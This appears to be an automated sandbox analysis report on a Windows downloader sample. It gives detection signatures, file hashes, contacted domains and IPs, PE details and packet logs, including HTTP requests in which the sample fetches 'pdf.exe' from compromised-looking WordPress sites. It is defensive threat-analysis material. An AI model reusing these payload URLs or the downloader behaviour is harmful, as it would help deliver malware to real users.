Analysis Report

Overview

General Information

Analysis ID:44368
Start time:13:04:36
Start date:05/06/2014
Overall analysis duration:0h 2m 53s
Report type:full
Sample file name:Ref_12242013.exe
Cookbook file name:Force HTTP.jbs
Analysis system description:XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
HCA enabled:false
Warnings:
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

Strategy | Detection
Threshold | malicious


Signature Overview

Key, Mouse, Clipboard, Microphone and Screen Capturing:

  • Creates a DirectInput object (often for capturing keystrokes)
  • Installs a raw input device (often for capturing keystrokes)

Networking:

  • Tries to download non-existing HTTP data (HTTP/1.1 404 Not Found)
  • URLs found in memory or binary data
  • Downloads files from webservers via HTTP
  • Found strings which match known social media URLs
  • Performs DNS lookups

Persistence and Installation Behavior:

  • Drops PE files

Data Obfuscation:

  • Binary may include packed or encrypted data
  • PE sections with suspicious entropy found

System Summary:

  • Binary contains paths to debug symbols
  • Creates files inside the user directory
  • Creates temporary files
  • Reads ini files
  • Spawns processes
  • Enables driver privileges
  • Reads the hosts file

HIPS / PFW / Operating System Protection Evasion:

  • May try to detect the Windows Explorer process (often used for injection)

Anti Debugging:

  • Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  • Creates guard pages, often used to prevent reverse engineering and debugging

Hooking and other Techniques for Hiding and Protection:

  • Disables application error messages (SetErrorMode)
  • Deletes itself after installation
  • Icon mismatch: uses an icon from a different legitimate application in order to fool users

Yara Overview

No Yara matches

Startup

  • system is xp
  • cleanup

Created / dropped Files

File Path (type and hashes listed below each path)
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ieupdater.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: DE158F1023935942A4ECED310FA6BBB5
  • SHA: 092EB490F6146DE14DEAB416626850396AA11F34
  • SHA-256: CC2E26FC310FC07BCCF8C8EEEF0EBA20E17F383B0E6A3A112F24ABF83765A7F1
  • SHA-512: D2BCB8774A641212B053A57196A281CD420A1A972533F9639136AEA84FBFD4C73710A7C5DA739EAE7804BEF90261FF4ADCA328EF557B489E6043DEB182F134F6
C:\Documents and Settings\Administrator\Cookies\administrator@bestwsos[1].txt
  • Type: ASCII text
  • MD5: 4DECF659BF3F2F3AFBCAB781DCDA0E79
  • SHA: CABECF4787017E5CE695A7C9BB4316C94302E778
  • SHA-256: 38992A1FB0C9331290CE6B491ACD9AC047A6ED4F3AE3EBA61774E38339D0609A
  • SHA-512: 1A8BFA5651B9DE98AF0F086F877A6FC7647278E2AAA0AB20327EAD68E8743F6B91D8A1675B735FFD0C4444233EFE8D4C165A7CF943AF35EB721CF25E51236262
\ROUTER
  • Type: Hitachi SH big-endian COFF object, not stripped
  • MD5: 00F949395144E159C79F8FB7BD4F0C68
  • SHA: 985003D3F6209DB96467BA9B611011752C322F2C
  • SHA-256: 5F7BD7A9EB12D5FD356FCD02EB0E6281785BBC1E81F8FCE2B59C7B2CAE3EA899
  • SHA-512: A227A7F1348E6864295986547F91611CD1F4215BE21930422A6B85764B220D64518C828C5A44CE858A7EB6561413C51853DF8F98C673C284D3F026A1AC354A5D

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Name Server | Active | Registrar | e-Mail
ruedigerbaltissen.com | 38.102.226.69 | ns10.hostthename.com ns11.hostthename.com | true | ENOM, INC. abuse@enom.com | RB0202@VERSANET.DE
bestwsos.com | 64.74.223.34 | dns5.name-services.com dns4.name-services.com dns2.name-services.com dns1.name-services.com dns3.name-services.com | true | ENOM, INC. abuse@enom.com | BF7915C5B1A94260AEF5C0EF3119EEDE.PROTECT@WHOISGUARD.COM

Contacted IPs

IP | Country | Pingable | Open Ports
38.102.226.69 | United States | unknown | unknown
64.74.223.34 | United States | unknown | unknown
195.186.1.121 | Switzerland | unknown | unknown

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
File name:Ref_12242013.exe
File size:12800 bytes
MD5:c77dd48c57156a20f0e32022e489546e
SHA1:cc0b69c3f49bb1bc7582acb81f38f7575d8d2d27
SHA256:850306c83bf6c5bfa1d2829af351f78cab01a1d81c7babfe6d54fb31eddf2f7a
SHA512:0579f7711b47d9937a2fcd658f579a4ce37451d3494b6a353501bc3849c8bae4d5e33af1ba442bf2b6adb77202df54369451b5c70f94d0e9720105ee9502320e

File Icon

Static PE Info

General

Entrypoint:0x401ebd
Entrypoint Section:.text
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x52B958BB [Tue Dec 24 09:49:47 2013 UTC]
TLS Callbacks:
Digitally signed:False
CLR (.Net) Version:

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x5278 | 0xea8 | data | English | United States
RT_DIALOG | 0x6138 | 0xe4 | data | English | United States
RT_GROUP_ICON | 0x6120 | 0x14 | MS Windows icon resource - 1 icon | English | United States
RT_MANIFEST | 0x5130 | 0x148 | XML document text | English | United States

Imports

DLL | Import
USER32.dll | RegisterClassExW, CreateWindowExW, GetMessageW, TranslateMessage, DispatchMessageW, DefWindowProcW, PostQuitMessage, ShowWindow, UpdateWindow, PostMessageA, SetWindowTextW
KERNEL32.dll | GetStartupInfoA, GetModuleHandleA, GetModuleHandleW, CloseHandle, CreateFileW, WriteFile, ReadFile
GDI32.dll | SetBkColor
MSVCRT.dll | __getmainargs, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _exit, _XcptFilter, exit, _acmdln, _initterm

Sections

Name | Virtual Address | Virtual Size | Raw Size | Entropy
.text | 0x1000 | 0x104c | 0x1200 | 6.81171312431
.rdata | 0x3000 | 0x4c6 | 0x600 | 4.69578017663
.data | 0x4000 | 0x1d0 | 0x200 | 3.97788180894
.rsrc | 0x5000 | 0x1220 | 0x1400 | 4.73910067186

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 5, 2014 13:05:16.403152943 CEST | 59902 | 53 | 192.168.1.10 | 195.186.1.121
Jun 5, 2014 13:05:16.653805971 CEST | 53 | 59902 | 195.186.1.121 | 192.168.1.10
Jun 5, 2014 13:05:16.662504911 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:16.662533998 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:16.662647009 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:16.667073965 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:16.667093992 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:17.383740902 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:17.397274017 CEST | 63952 | 53 | 192.168.1.10 | 195.186.1.121
Jun 5, 2014 13:05:17.434500933 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:17.434983969 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:17.435038090 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:17.512768984 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:17.513273954 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:17.513328075 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:17.590457916 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:17.590964079 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:17.591017008 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:17.719928980 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:17.742078066 CEST | 53 | 63952 | 195.186.1.121 | 192.168.1.10
Jun 5, 2014 13:05:17.754154921 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:17.754172087 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:17.754261017 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:17.755517006 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:17.755537033 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.099504948 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.250854015 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.250878096 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.253633976 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:19.253663063 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:19.253772974 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:19.254935026 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:19.254955053 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:19.292107105 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.292115927 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.292241096 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.292253971 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.292370081 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.306098938 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.322273016 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.322300911 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.322763920 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.322809935 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.323215961 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.341712952 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.341742039 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.341753006 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.342345953 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.342390060 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.342797041 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.342834949 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.470024109 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.980375051 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:19.982242107 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.982270002 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:19.982392073 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.983627081 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:19.983638048 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:20.093738079 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:20.093748093 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:20.094027042 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:20.094058037 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:20.094402075 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:20.129718065 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:20.130269051 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:20.130780935 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:20.130831957 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Jun 5, 2014 13:05:20.344394922 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:05:21.315256119 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.438119888 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:21.438172102 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.470055103 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.470083952 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.470094919 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.470510960 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:21.470556021 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.470729113 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:21.473357916 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.473386049 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.473906994 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:21.473948956 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.474374056 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:21.482744932 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.519324064 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.519355059 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.519366026 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.519764900 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:21.519810915 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:21.519962072 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:21.657130003 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:34.260359049 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:34.260802031 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:05:36.471697092 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Jun 5, 2014 13:05:36.471818924 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:07:21.722714901 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:07:21.723237038 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
Jun 5, 2014 13:07:21.723484993 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
Jun 5, 2014 13:07:21.723727942 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 5, 2014 13:05:16.403152943 CEST | 59902 | 53 | 192.168.1.10 | 195.186.1.121
Jun 5, 2014 13:05:16.653805971 CEST | 53 | 59902 | 195.186.1.121 | 192.168.1.10
Jun 5, 2014 13:05:17.397274017 CEST | 63952 | 53 | 192.168.1.10 | 195.186.1.121
Jun 5, 2014 13:05:17.742078066 CEST | 53 | 63952 | 195.186.1.121 | 192.168.1.10

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 5, 2014 13:05:16.403152943 CEST | 192.168.1.10 | 195.186.1.121 | 0x8b47 | Standard query (0) | bestwsos.com | A (IP address) | IN (0x0001)
Jun 5, 2014 13:05:17.397274017 CEST | 192.168.1.10 | 195.186.1.121 | 0x15da | Standard query (0) | ruedigerbaltissen.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 5, 2014 13:05:16.653805971 CEST | 195.186.1.121 | 192.168.1.10 | 0x8b47 | No error (0) | bestwsos.com | | 64.74.223.34 | A (IP address) | IN (0x0001)
Jun 5, 2014 13:05:17.742078066 CEST | 195.186.1.121 | 192.168.1.10 | 0x15da | No error (0) | ruedigerbaltissen.com | | 38.102.226.69 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

  • bestwsos.com
  • ruedigerbaltissen.com

HTTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
(For each packet, the header and decoded data follow on the lines below; the trailing number is Total Bytes Transferred (KB).)
Jun 5, 2014 13:05:16.667073965 CEST | 1031 | 80 | 192.168.1.10 | 64.74.223.34
GET /wp-content/uploads/pdf.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: bestwsos.com
Total Bytes Transferred (KB): 0
Jun 5, 2014 13:05:17.383740902 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7478
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=6919fc02-27ef-4090-bed1-5234bf1fe9c6; path=/
Set-Cookie: VisitorID=582a28ee-461a-4a82-9824-efe49f9a92a1&Exp=6/5/2017 4:05:19 AM; expires=Mon, 05-Jun-2017 11:05:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 05 Jun 2014 11:05:19 GMT
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e
Data Ascii: <!doctype html><html>
Total Bytes Transferred (KB): 1
Jun 5, 2014 13:05:17.434500933 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Data Raw: 0d 0a 09 0d 0a 3c 68 65 61 64 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65
Data Ascii: <head><meta charset="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/><meta name="viewport" content="width=device-width, initial-scale=1"/> <title>Bestwsos.com</title><meta name="keywords" con
Total Bytes Transferred (KB): 2
Jun 5, 2014 13:05:17.435038090 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Data Raw: 2c 0d 0a 20 20 20 20 27 61 64 74 65 73 74 27 3a 20 27 6f 66 66 27 2c 0d 0a 20 20 20 20 27 68 6c 27 3a 20 27 27 0d 0a 7d 3b 0d 0a 0d 0a 76 61 72 20 73 65 61 72 63 68 62 6f 78 42 6c 6f 63 6b 20 3d 0d 0a 7b 0d 0a 20 20 20 20 27 63 6f 6e 74 61 69 6e
Data Ascii: , 'adtest': 'off', 'hl': ''};var searchboxBlock ={ 'container': 'searchbox', 'type': 'searchbox', 'width': '300px', 'widthSearchButton': 70, 'colorBackground': 'transparent', 'colorSearchButton':
Total Bytes Transferred (KB): 4
Jun 5, 2014 13:05:17.512768984 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Data Raw: 74 48 61 73 68 27 3a 20 27 31 34 31 39 35 33 32 38 35 33 27 2c 0d 0a 20 20 20 20 27 74 69 6d 65 27 3a 20 27 36 2f 35 2f 32 30 31 34 20 34 3a 30 35 3a 31 39 20 41 4d 27 2c 0d 0a 20 20 20 20 27 74 69 63 6b 73 27 3a 20 27 36 33 35 33 37 35 33 37 39
Data Ascii: tHash': '1419532853', 'time': '6/5/2014 4:05:19 AM', 'ticks': '635375379192190049', 'domainName': 'bestwsos.com', 'searchText': '', 'actionCode': 'InitialView', 'adNetworkID': '2010001', 'moduleID': '29',
Total Bytes Transferred (KB): 5
Jun 5, 2014 13:05:17.513328075 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Data Raw: 6b 69 6e 67 5f 66 6f 72 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 61 63 74 69 6f 6e 3d 22 2f 64 65 66 61 75 6c 74 2e 70 68 70 22 3e 0d 0a 0d 0a 0d 0a 3c 21 2d 2d 0d 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
Data Ascii: king_form" method="get" action="/default.php"> =================================================** START DEBUG OUTPUT **================================================= Version: 3.7.169.16
Total Bytes Transferred (KB): 6
Jun 5, 2014 13:05:17.590457916 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Data Raw: 63 68 65 5f 54 69 6d 65 3a 20 36 6d 73 20 28 33 25 29 0d 0a 20 20 20 20 20 20 20 44 61 74 61 62 61 73 65 5f 54 69 6d 65 3a 20 31 39 6d 73 20 28 39 25 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 41 50 49 5f 54 69 6d 65 3a 20 31 37 32 6d 73 20 28
Data Ascii: che_Time: 6ms (3%) Database_Time: 19ms (9%) API_Time: 172ms (86%)=================================================** END DEBUG OUTPUT **=================================================--
Total Bytes Transferred (KB): 7
Jun 5, 2014 13:05:17.591017008 CEST | 80 | 1031 | 64.74.223.34 | 192.168.1.10
Data Raw: 74 72 79 20 7b 20 72 65 74 75 72 6e 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 27 29 3b 20 7d 20 63 61 74 63 68 28 65 29 20 7b 7d 0d 0a 20 20 74 72 79 20 7b 20 72 65 74 75 72 6e
Data Ascii: try { return new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) {} try { return new XMLHttpRequest(); } catch(e) {} return null;}GetIPPI('dd1fd096-500f-4ab9-9ad7-687dbf0d9749');</script><script type="text/javascript">var ga
Total Bytes Transferred (KB): 8
Jun 5, 2014 13:05:17.755517006 CEST | 1032 | 80 | 192.168.1.10 | 38.102.226.69
GET /wp-content/uploads/2012/09/pdf.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: ruedigerbaltissen.com
Total Bytes Transferred (KB): 9
Jun 5, 2014 13:05:19.099504948 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
HTTP/1.1 404 Not Found
Date: Thu, 05 Jun 2014 11:05:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://ruedigerbaltissen.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="CAO IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2a7b875c096aecdecb60c18df4bdcc6b; path=/
Set-Cookie: cookies=yes; expires=Thu, 05-Jun-2014 12:05:17 GMT
Transfer-Encoding: chu
Data Raw:
Data Ascii:
Total Bytes Transferred (KB): 10
Jun 5, 2014 13:05:19.250878096 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0a
Data Ascii: kedContent-Type: text/html; charset=UTF-834<!DOCTYPE html> [if IE 7]><html class="ie ie7" clang="en-US"33><![endif]--> [if IE 8]><html class="ie ie8" clang="en-US"38><![endif]--> [if !(IE 7) | !(IE 8) ]
Total Bytes Transferred (KB): 10
Jun 5, 2014 13:05:19.254935026 CEST | 1033 | 80 | 192.168.1.10 | 64.74.223.34
GET /wp-content/uploads/pdf.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: bestwsos.com
Cookie: SessionID=6919fc02-27ef-4090-bed1-5234bf1fe9c6; VisitorID=582a28ee-461a-4a82-9824-efe49f9a92a1&Exp=6/5/2017 4:05:19 AM
Total Bytes Transferred (KB): 10
Jun 5, 2014 13:05:19.292107105 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 32 61 0d 0a 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a 33 36 64 37 0d 0a 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72
Data Ascii: 2a> <![endif]--><head><meta charset="36d7UTF-8"><meta name="viewport" content="width=device-width"><title>Page not found | Betriebliche Altersvorsorge</title><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pin
Total Bytes Transferred (KB): 12
Jun 5, 2014 13:05:19.292115927 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 79 74 68 69 72 74 65 65 6e 2f 63 73 73 2f 69 65 2e 63 73 73 3f 76 65 72 3d 32 30 31 33 2d 30 37 2d 31 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c
Data Ascii: ythirteen/css/ie.css?ver=2013-07-18' type='text/css' media='all' /><![endif]--><script type='text/javascript' src='http://ruedigerbaltissen.com/wp-includes/js/jquery/jquery.js?ver=1.10.2'></script><script type='text/javascript' src='http://
Total Bytes Transferred (KB): 13
Jun 5, 2014 13:05:19.292253971 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6d 61 69 6c 3a 20 65 6d 61 69 6c 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 73 74 6e 61 6d 65 20 3a 20 6c 69 73 74 6e 61 6d 65 2c 0d 0a 20 20 20 20 20 20 20 20 20
Data Ascii: email: email, listname : listname, meta_web_form_id: meta_web_form_id, meta_message: meta_message, redirect: redirect, met
Total Bytes Transferred (KB): 15
Jun 5, 2014 13:05:19.306098938 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 75 62 6c 65 6f 70 74 2c 72 65 64 69 72 65 63 74 2c 65 72 72 6f 72 72 65 64 69 72 65 63 74 2c 20 76 69 64 4e 75 6d 2c 20 76 69 64 50 61 67 65 49 64 29 0d 0a 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 64 61 74
Data Ascii: ubleopt,redirect,errorredirect, vidNum, vidPageId) { var data = { action: 'fanbuzzIcAddName', fields_fname : fields_fname, fields_lname: fields_
Total Bytes Transferred (KB): 15
Jun 5, 2014 13:05:19.322273016 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 74 69 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 75 62 6c 65 6f 70 74 3a 20 64 6f 75 62 6c 65 6f 70 74 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 64 69 72 65 63 74 3a 20 72 65 64
Data Ascii: tid, doubleopt: doubleopt, redirect: redirect, errorredirect: errorredirect }; jQuery.post('/wp-admin/admin-ajax.php', data, function(){svphidehtml(vidNum
Total Bytes Transferred (KB): 17
Jun 5, 2014 13:05:19.322300911 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 63 4e 61 6d 65 28 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 22 6c 69 6b 65 68 74 74 70 72 75 65 64 69 67 65 72 62 61 6c 74 69 73 73 65 6e 63 6f 6d 77 70
